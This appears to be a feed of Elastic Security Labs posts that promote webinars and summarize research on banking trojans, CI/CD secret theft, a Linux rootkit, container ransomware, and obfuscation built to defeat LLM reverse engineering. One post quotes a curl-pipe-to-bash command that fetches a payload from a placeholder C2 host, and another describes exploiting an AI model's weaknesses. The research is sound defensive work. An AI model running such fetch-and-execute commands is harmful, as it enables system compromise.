Elastic Security Labs

Your SOC tools don't talk to your dev tools. Your detection engineers write rules in one place and investigate in another. Live on June 17, we're demoing autonomous investigation workflows and security operations running inside Claude, Cursor, and Copilot. One week to go. Register now: https://t.co/f3bk2NABBt

Attackers are compressing timelines from hours to minutes. Most SOCs are still stitching context together across three tabs and a ticket. On June 17, we're showing the full lifecycle, from first alert to staged response, with AI agents handling triage, enrichment, and investigation live. Prizes too. Save your seat: https://t.co/1Iihl0rXa8

We uncovered a new Brazilian banking trojan campaign: TCLBANKER. What makes TCLBANKER notable isn’t just the malware itself, but how it spreads. The campaign uses compromised WhatsApp and Outlook accounts to propagate through trusted user relationships, deploys targeted banking overlays, and incorporates anti-analysis techniques designed to evade detection. For defenders, it’s another example of malware increasingly blending into legitimate user behavior and everyday communication channels, making detection harder and trust easier to exploit. Our latest research breaks down the infection chain, propagation methods, evasion tactics, and detection opportunities observed across the campaign. Read the full analysis: https://t.co/9z47oaEWdD

It's a drop-in CI template (no Python, no custom runtimes) that runs 50+ regex signals across changed CI/CD files, then passes the full diff and signal summary to Claude Code for structured threat analysis. Works across GitHub Actions, GitLab CI, and Azure DevOps. Verdicts ship to Elasticsearch so you can correlate across platforms with ES|QL. 19 malicious example diffs included, modeled after real incidents. Nord Stream payloads. ArtiPACKED. Contagious Interview IDE poisoning. The test suite validates every signal. Full research + repo: Blog: https://t.co/PtPduYdzbM Tool: https://t.co/C9iaLjpfWe

Your YAML files hold more credentials than most production servers. The GhostAction campaign last September hit 817 repos and stole 3,325 secrets this way. HackerBot-Claw followed in February, systematically scanning for pull_request_target misconfigs across public repos. Aqua's Trivy repo was fully compromised. 33,000 secrets. Nearly 7,000 machines. We built cicd-abuse-detector to catch this at the PR stage.

LLMs have gotten good enough at reverse engineering to recover source code from obfuscated binaries with real accuracy. So we asked the obvious next question: how fast and cheap is it to use one to build obfuscation specifically designed to beat it? We benchmarked Claude Opus 4.6 against the Tigress obfuscator across 20 targets first, to map its strengths and failure modes. 40% solve rate. Phase 3 multi-layer combos hit 0%, with cost explosions that killed the runs. Then we ran a dev/test/refine loop to build 3 purpose-built obfuscation variants targeting the same crackme, iterating directly against the model's known weaknesses. The finding: LLM-targeted obfuscation is fast and cheap to develop. Context windows, budget caps, and shortcut biases are all exploitable attack surfaces. The arms race just shifted.

Key takeaways: - Threat actors posed as a VC firm on LinkedIn and Telegram, luring targets into opening a weaponized Obsidian vault - The attack abuses Obsidian's Shell Commands plugin to execute a malicious payload on vault open, no vulnerability required - PHANTOMPULSE is a previously undocumented Windows RAT with blockchain based C2 resolution via Ethereum transaction data - The macOS payload uses an obfuscated AppleScript dropper with a Telegram channel as a fallback C2 - Elastic Defend detected and blocked the attack before PHANTOMPULSE could execute

What D4C catches across the kill chain: - curl spawns a shell interpreter → caught at Stage 1 - Service account token check (/var/run/secrets/...) → flags Kubernetes pivot intent - kube. py downloaded to /tmp, executed immediately → cluster-wide lateral movement begins - Competitor mining processes killed via pkill → even that gets flagged Real-world scenario. Real detection logic. Full MITRE ATT&CK coverage from exec to impact. Read the full blog: https://t.co/jvzxchYFhG

One command. No file written to disk. Full code execution inside a container. curl -fsSL [C2]:666/files/proxy. sh | bash This is how TeamPCP's container ransomware operation starts. Elastic Security Labs walked the full attack chain using Defend for Containers (D4C) to show exactly what runtime signals surface at every stage.

🧵 It calls itself "AMD Memory Encryption Support." It's not. VoidLink's Linux rootkit disguises as a legitimate AMD kernel driver then hides processes, connections, and itself from the OS entirely. Elastic Security Labs analyzed leaked source code revealing 4 generations of this rootkit, from CentOS 7 to Ubuntu 22.04.

One more thing. Check Point Research established VoidLink was built almost entirely through AI-assisted workflows, concept to functional implant in under a week. The source code confirms it at the code level. Phase-numbered changelogs structured like LLM prompts. Tutorial-style comments explaining basic kernel concepts. 10 sequential eBPF iterations with reasoning traces left in. This is what AI-lowered barriers to kernel development looks like in the wild.